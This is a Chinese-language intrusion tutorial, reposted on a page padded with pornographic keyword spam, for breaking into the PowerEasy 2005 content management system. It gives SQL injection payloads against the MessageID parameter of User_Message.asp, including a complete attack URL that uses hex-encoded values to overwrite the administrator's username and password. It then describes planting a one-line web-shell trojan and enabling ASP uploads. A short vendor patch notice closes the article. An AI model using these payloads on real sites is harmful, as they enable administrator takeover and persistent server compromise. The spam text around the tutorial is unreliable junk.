韩剧1988免费观看全集_久久影视三级福利片_亚洲视频在线观看免费_在线观看欧美日韩_国产亚洲激情在线_亚洲精品美女久久久_欧美国产日韩一区二区在线观看_91在线观看免费高清完整版在线观看_日韩av免费看_国产又爽又黄的激情精品视频_琪琪亚洲精品午夜在线_欧美性猛xxx_不卡毛片在线看_国产亚洲日本欧美韩国_91国内在线视频_精品国产福利视频

當前位置:蘿卜系統(tǒng) > 網(wǎng)絡技術(shù)教程 > 詳細頁面

入侵動易2005

入侵動易2005

更新時間:2019-01-13 文章作者:未知 信息來源:網(wǎng)絡 閱讀次數(shù):

網(wǎng)絡技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡、傳感器等。 當前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡則被認為是互聯(lián)網(wǎng)發(fā)展的第三階段。

1,發(fā)現(xiàn)漏洞

入侵動易2005

影響版本:

標準版 SQL
企業(yè)版 SQL版
學校版 SQL版
政府版 SQL版
全功能版 SQL版
免費access 版
所有版本(包括免費版、商業(yè)SQL版及Access版)
不被影響的版本:2005動易ASSESS版
漏洞文件:Admin目錄下 Admin_ChkPurview.asp,Admin_Login.asp,Admin_RootClass_Menu.asp
      User 目錄下 User_Message.asp

等級:嚴重

描述:
此漏洞影響全部SQL版,如果用SA連接數(shù)據(jù)庫黑客可以拿到系統(tǒng)管理員權(quán)限。如果用普通用戶連接最嚴重情況,可以備份腳本木馬。一般情況可能改管理員登陸密碼,從而達到黑客登陸動易后臺?刂普麄動易系統(tǒng)!
ACCESS版可以得到管理員md5密碼!

主要問題在于 User_Message.asp
http://77169.org/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=90;

MessageID 沒有嚴格過濾,有注入漏洞。只過濾了 單引號, 這就能擋住聰明的黑客嗎?
我們來看一下,User_Message.asp的源代碼、
————————————————————————————————————
<!--#include file="User_CommonCode.asp"-->
<%
Call PE_Execute("PE_AdminCommon", "User_Message")
%>
——————————————————————————————————————

動易系統(tǒng)是不開放源代碼的,User_Message.asp 源代碼的意思就是調(diào)用 PE_AdminCommon.dll 中的 User_Message 函數(shù)。
有人可能要問了這樣的漏洞怎么發(fā)現(xiàn)的呢?
像這樣的文件 只能用分支測試法 給這個文件用到的全部變量 都測試一遍。這是很耗時的測試方法。

2,分析漏洞
源程序是不開放的,所以源程序沒什么好分析的。
現(xiàn)在我們來這漏洞入侵動易2005 sp1系統(tǒng)。
首先分兩個版來說
1,SQL版,
(1,發(fā)現(xiàn)注入點
User_Message.asp 文件中的 MessageID 沒有嚴格過濾。
測試,加 單引號,
正常返回。如圖一

入侵動易2005

加 ; ,加 --
都顯示出錯。
如圖二:

入侵動易2005

看提示 就明白有注入點了,加單引號沒用,應當是過濾了引號。沒關(guān)系過濾了單引號 阻擋不了我們?nèi)肭值牟椒ァ?/p>
[page_break](2,繞過單引號

估計 注入點基本形式是這樣的   select * from pe_XXX  where MessageID=(注入點)
我們想注入這樣的文件,就要繞過單引號。
下面這樣的代碼 我們可以用它來繞過單引號。

declare @a sysname
select @a=<command>
exec master.dbo.xp_cmdshell @a
上面這語句主要是用來繞過單引號。不過我們要改一下,
declare @a sysname
select @a=<command>
update pe_admin set password=@a where id=1--


); declare @a sysname select @a=0x3300 update pe_admin set password=@a where id=1--

完整的url
http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3);%20declare%20@a%20sysname%20select%20@a=0x3300%20update%20pe_admin%20set%20password=@a%20where%20id=1--
這條語句是給后臺的id=1的管理員密碼改成 3。因為@a=0x3300 ,0x3300 是16進制的3.
執(zhí)行成功之后如圖3:

入侵動易2005


(3,得到管理員權(quán)限
分兩步:
一,關(guān)聯(lián)前臺username
動易后臺登陸 要關(guān)聯(lián)前臺用戶。
先設置后臺管理員的前臺用戶名,為我們注冊的用戶。

declare @a sysname
select @a=<command>
update pe_admin set username=@a where id=1--

說到這里,我要講一下@a 如果改
比如我們注冊的用戶為111111
@a=0x310031003100310031003100
我怎么知道的呢?隨便在網(wǎng)上找一個16進制轉(zhuǎn)換器就知道了,
比如 用這個工具轉(zhuǎn)換也行。
如圖4

入侵動易2005

所以注入語句成了這樣的
); declare @a sysname select @a=0x310031003100310031003100 update pe_admin set username=@a where id=1--


二,改后臺登陸的password
接著給后臺密碼改成我們的密碼。我們就可以想辦法登陸了。
declare @a sysname
select @a=<command>
update pe_admin set password=@a where id=1--

我們改后臺密碼,要改成已經(jīng)加密的md5密碼
比如我們提供一個,469e80d32c0559f8 這是admin888加密之后的MD5密碼。
@a=0x3400360039006500380030006400330032006300300035003500390066003800
所以構(gòu)造注入語句
); declare @a sysname select @a=0x3400360039006500380030006400330032006300300035003500390066003800 update pe_admin set password=@a where id=1--

大家感覺很簡單吧!一般我們不這么做,教程 寫給新手看的,不能太難。
在真正的黑客行為中,如果給人家的后臺密碼改了,管理員登陸不上去。人家必然會發(fā)現(xiàn)的。
所以 給高手提供思路 自己研究一下。
比如
1,可以插入一個管理員 用完之后刪除
2,可以先暴出管理員密碼,用完之后,再還原。


(4,上傳木馬
1,rootclass_menu_config.asp 文件中的菜單其它特效 中插入一句話木馬。
如圖 5

入侵動易2005

插入一句話木馬之后,你可以用客戶端連接了。

2,給上傳屬性改成可以上傳ASP類型。上傳時抓包 給最后一個加上結(jié)束符。(類似于動網(wǎng)上傳)
SQL版我只說這么多了,如果你上傳不了木馬,或者是找不到后臺管理地址,來我們論壇提問吧!有我們有辦法解決。 http://bbs.77169.com

2,ACCESS版

(1,如果發(fā)現(xiàn)漏洞
在測試免費版的動易系統(tǒng)之時,發(fā)現(xiàn)免費的ACCESS版動易用戶控制面板沒有 發(fā)送短消息的功能。
不過,動易留有相關(guān)接口,登陸用戶控制面板 直接瀏覽 User_Message.asp 也可以注入.

(2,注入過程(略)
mssql和access 注入過程是點不一樣的;鞠嗤,這也留給大家自己去測試吧。


三,解決方案

臨時解決方案:

解決方案(臨時):更新補丁包中的三個文件,并先刪除user目錄下的User_Message.asp文件。SP2正式版中將會修復此漏洞,請目前使用SP1的用戶盡快打好此補丁。

補丁下載: http://download.asp163.net/PowerEasy2005SP1Patch.rar

感謝llikz、怪狗等網(wǎng)友對系統(tǒng)進行安全檢測并無私提供相關(guān)漏洞信息!



網(wǎng)絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術(shù)都需要適時應勢,對應發(fā)展,這正是網(wǎng)絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統(tǒng)下載排行

網(wǎng)站地圖xml | 網(wǎng)站地圖html
色女孩综合网| 在线观看区一区二| 亚洲精品中文字幕乱码三区91| 国产欧美综合色| 欧美日韩在线精品一区二区三区激情综| 国产原创视频在线观看| 国产一区二区高清在线| 欧美激情一区二区三区在线视频| 色偷偷偷在线视频播放| 可以在线观看的黄色| 日本福利在线| 久久久久久久久久成人| 亚洲视频久久| 精品人妻一区二区乱码| 色诱亚洲精品久久久久久| 中国一区二区视频| 欧美性xxxxxxxx| 中文字幕一区二区不卡| 国产精品免费一区二区三区| 欧美精品少妇videofree| 91国自产精品中文字幕亚洲| 一个人看的www片免费高清视频| 欧美丰满熟妇bbbbbb百度| 欧美激情a∨在线视频播放| 国产aⅴ综合色| 男男视频亚洲欧美| 国产精品高精视频免费| 日本福利在线观看| 国产三级精品三级观看| 超碰97免费观看| 在线观看av免费观看| 欧美精选视频一区二区| 亚洲欧美精品一区二区三区| 亚洲成人黄色影院| 欧美日韩免费区域视频在线观看| 777久久精品| 欧美tickling网站挠脚心| 欧美午夜久久| 欧美中文字幕视频| 国产精品igao视频网网址不卡日韩| 午夜精品久久久久久久久久久久| 又黄又爽的视频在线观看| 欧美精品日韩少妇| 欧美做受高潮电影o| yw193.com尤物在线| 国产精品一区二区你懂得| 成年人在线观看网站| 国产欧美日韩三级| 亚洲精品国产熟女久久久| 日韩av电影免费| 欧美三级韩国三级日本三斤| 日韩女优中文字幕| 亚洲一一在线| 香蕉视频在线视频| 97超级在线观看免费高清完整版电视剧| 免费成人在线视频观看| 浅井舞香一区二区| 天天爱天天做天天操| 日韩av在线免费播放| 在线观看免费污视频| 国产一区二区三区四区五区在线| 午夜在线小视频| 欧美日韩国产免费观看视频| 国产精品免费成人| 久草在线看片| 亚洲妇熟xx妇色黄| 成人国产精品免费| 丁香五月缴情综合网| 日本三级韩国三级欧美三级| 精品国产伦一区二区三区观看说明| 加勒比一区二区三区| 亚洲国产精品人人做人人爽| 亚洲精品成人在线| 超碰在线免费av| 精品国产福利在线| 久久久久国产精品麻豆| 免费无码国产精品| caoporm超碰国产精品| 欧美亚洲精品在线| 黄色毛片免费| 久久久久久久| 两个人的视频www国产精品| 亚洲丝袜制服诱惑| 一区二区三区在线观看免费视频| 亚洲熟妇一区二区| 国产孕妇孕交大片孕| 欧美电影免费观看完整版| 免费国产在线精品一区二区三区| av中文字幕免费| 欧美日韩一区二区三区在线免费观看| 夜夜嗨av色综合久久久综合网| 在线观看亚洲免费视频| 在线电影福利片| 在线成人av电影| 国产精品免费人成网站酒店| 色播五月综合网| 77thz桃花论族在线观看| 无码人妻久久一区二区三区不卡| 欧美韩国日本一区| 最好2018中文免费视频| 欧美调教在线| 午夜精品福利视频网站| 亚洲日本在线观看视频| 丰满岳乱妇dvd日本| 国内偷自视频区视频综合| 一区二区影视| 69国产精品| 九一精品久久久| a天堂资源在线观看| 天堂一区在线观看| 日韩精品一区二区三区中文字幕| 人妻视频一区二区三区| 老司机午夜精品99久久| 日韩黄色片网站| 亚洲综合不卡| 成全在线观看免费完整动漫| 91亚洲一区二区| 精品少妇一区二区三区免费观看| 欧美激情一区在线| 午夜偷拍福利视频| 有码av在线| 久久www成人_看片免费不卡| 日日爱夜夜操| 在线视频你懂得一区二区三区| 亚洲国产精品黑人久久久| av中文字幕电影在线看| 日韩av一区二区在线影视| 国产麻豆精品高清在线播放| 亚洲高清视频在线观看| 亚洲国产中文在线二区三区免| 中文字幕精品无码亚| 欧美色视频在线观看| 日韩黄色在线免费观看| 亚洲涩涩av| 91麻豆蜜桃| 欧美日韩在线电影| 欧美xxxx网站| 人人澡人一摸人人添| 美女免费视频黄| 怕怕欧美视频免费大全| 91亚洲免费视频| 一个人看的www视频免费观看| 东京干手机福利视频| 日本免费一区二区三区| 免费在线国产| 日本免费黄色| 亚洲精品一区二区三区蜜桃久| 亚洲日韩中文字幕| 99久久国产综合精品女小说| 日韩电影中文字幕av| 最新av网址在线观看| 欧美一二三区视频| 蜜臀久久99精品久久久酒店新书| 综合久久国产九一剧情麻豆| 99久免费精品视频在线观看| 午夜精品久久久久久久爽| www成人在线观看| 国产成人综合精品| 91精品国产91久久久久久| 欧美日韩国产一区二区三区地区| 欧美熟妇精品黑人巨大一二三区| 九九久久九九| 日本黄网站色大片免费观看| 一级做a爰片久久| 中文字幕av导航| 性直播在线观看| 成人丁香基地| 亚洲三级网址| 青青草社区在线| 欧美野外猛男的大粗鳮| 羞羞视频网站在线观看| 免费日本视频一区| 一区二区三区中文字幕电影| 国产欧美精品一区aⅴ影院| 日韩精品亚洲一区| 免费吸乳羞羞网站视频| 人妖粗暴刺激videos呻吟| 97免费视频在线| 顶级网黄在线播放| 五月天亚洲色图| 制服丝袜激情欧洲亚洲| 天天草天天干| 日韩一区二区三区电影| 久久激情av| 在线天堂中文www视软件| 一区视频在线看| 日av在线播放中文不卡| 在线视频一区二区免费| 另类图片第一页| 精品视频久久| 中文一区二区完整视频在线观看| 99久久99久久久精品棕色圆| 福利片一区二区| 久久91麻豆精品一区| 久久综合狠狠综合久久综青草| 色狠狠一区二区| 好吊妞视频这里有精品| 国产一区二区三区成人| 国模私拍一区二区国模曼安| 午夜精品在线观看| 97成人资源| 成人黄色一级视频| 深夜福利网站在线观看| 少妇高潮一区二区三区| 91久久免费视频| 欧美一区一区| 欧美全黄视频| 秋霞在线观看一区二区三区| 一区二区在线免费观看视频| 国产精品最新自拍| 久久久久一本一区二区青青蜜月| 国内精品久久久久久久果冻传媒| 1024手机看片国产| 国产精品成人一区二区不卡| 奇米影视第四色7777| 日日夜夜免费精品视频| 国产69精品久久久久久久| 美女极度色诱视频www免费观看| 婷婷国产成人久久精品激情| 一区二区精彩视频| 欧美日韩aaaaaa| 午放福利视频在线播放| 轻轻草成人在线| 久久中国妇女中文字幕| 日韩一级完整毛片| 国产精品全国免费观看高清| 久久激情五月婷婷| 不卡视频一二三| 国产日韩在线观看av| 性感女国产在线| 久久人体av| 在线最新版中文在线| 91久久精品网| 免费在线黄网| 久久免费精品视频在这里| 午夜精品久久久久久99热软件| www.老鸭窝.com| 九九在线免费视频| 成人av在线亚洲| 91精品国产乱| 成人欧美亚洲| 亚洲AV第二区国产精品| 超碰免费在线观看| 日韩亚洲欧美在线| av软件在线观看| 欧美一区二区三区免费在线看| 欧美日韩黄色一区二区| 神马影院我不卡| 国产一级揄自揄精品视频| 欧美一级久久| 日韩欧美不卡一区| 亚洲最大的免费视频网站| 中文字幕在线永久| av资源站一区| 国产精品你懂的在线观看| 久久久久久久久久一区| 欧美h版在线观看| 亚洲激情久久久| av老司机免费在线| 男人舔女人下部高潮全视频| 成av人免费青青久| 国产色a在线| 一区二区三区少妇| 四虎网站在线观看| 美日韩一区二区| 2020国内自拍视频| 999视频在线| 亚洲小视频网站| 欧美va天堂在线| 国产成人免费9x9x人网站视频| 黄色网页在线免费看| 欧美成人免费| 91青草视频久久| 美女在线一区二区| 羞羞视频在线观看| 久久婷婷国产| 国产精品久久久久久一区二区三区| 视频一区二区视频| 草草在线观看| 四虎国产精品永远| 三叶草欧洲码在线| 国产精成人品2018| 日韩欧美理论片| 日本丰满少妇黄大片在线观看| 99国产精品白浆在线观看免费| 久久久久亚洲AV| 女厕盗摄一区二区三区| 你懂的视频在线看| 国产男女猛烈无遮挡免费视频| 韩国av永久免费| 最近国语视频在线观看免费播放| 久久久福利影院| 青青青青国产视频| 欧美极品jizzhd欧美18| av成人免费观看| 91系列在线播放| 国产精品成人一区二区三区夜夜夜| 欧美黄色成人网| 激情综合色丁香一区二区| 亚洲天堂成人在线视频| 精品国产成人亚洲午夜福利| 豆国产97在线 | 亚洲| 精品国产午夜肉伦伦影院| 日日操免费视频| 一级黄色免费网站| chinese叫床对白videos| 欧美日韩综合一区二区三区| 99re6这里只有精品视频在线观看| 欧美一区二区三区四区在线| 国产精品探花在线| 国产视频综合在线| 色喇叭免费久久综合| 五月国产精品| 国产高清在线免费观看| 福利地址发布页| 岛国av一区二区在线在线观看| 黄色在线观看免费| 青青草免费av| av男人的天堂在线| 欧美激情免费| 国产精品一二| 国内精品麻豆美女在线播放视频| 中国女人做爰视频| 日韩高清不卡一区二区三区| 精品久久网站| 国产一区二区三区在线观看网站| 91短视频在线观看| 国产精品精品国产|